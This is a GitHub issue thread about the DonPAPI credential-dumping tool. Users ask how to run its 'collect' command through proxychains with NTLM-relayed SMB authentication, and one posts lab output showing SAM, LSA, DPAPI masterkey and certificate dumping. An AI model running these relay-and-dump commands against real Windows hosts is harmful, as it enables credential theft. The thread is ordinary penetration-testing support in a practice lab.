DonPAPI icon indicating copy to clipboard operation
DonPAPI copied to clipboard
verified publisher icon login-securite

Support for Proxied SMB Authentication Connections

Open mr-pmillz opened this issue 1 year ago • 2 comments

Prior to version 2.0, it was possible to proxy smb relayed auth from ntlmrelayx.py to donpapi via the following syntax:

proxychains4 donpapi -o . -dc-ip <DCIP> -no-pass NETBIOSDOMAIN/[email protected]

^ This works properly as intended.

In the latest version since 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as but not limited to:

proxychains4 donpapi collect -d example.com --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect -d NETBIOSDOMAIN --dc-ip <DCIP> --no-pass -u USERNAME -t 10.10.10.10

Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?

mr-pmillz avatar Aug 08 '24 20:08 mr-pmillz

Hey @mr-pmillz, I am practicing Game of Active Directory and was able to get it run as proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass however even as the output shows following

[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials

I see only one secret and 2 certs in the donpapi web gui and should get more afaik

vinsroman avatar Sep 18 '24 08:09 vinsroman

Ah interesting. Does it work with the DC IP and domain flags? Or does it only work when those flags are not specified when using proxied auth? @vinsroman

mr-pmillz avatar Oct 18 '24 17:10 mr-pmillz

Hey. Sorry for the delay. I have not been able to reproduce the issue:

Image

FYI, when you use DonPAPI through proxychains, it won't be able to dump a lot of secrets. This is because you won't use domain backup keys or even user credentials, so you will be able to collect only SYSTEM related secrets (Scheduled tasks, SCCM secrets, etc.).

Closing now, but feel free to reopen if I misunderstood / if needed !

zblurx avatar Feb 25 '25 16:02 zblurx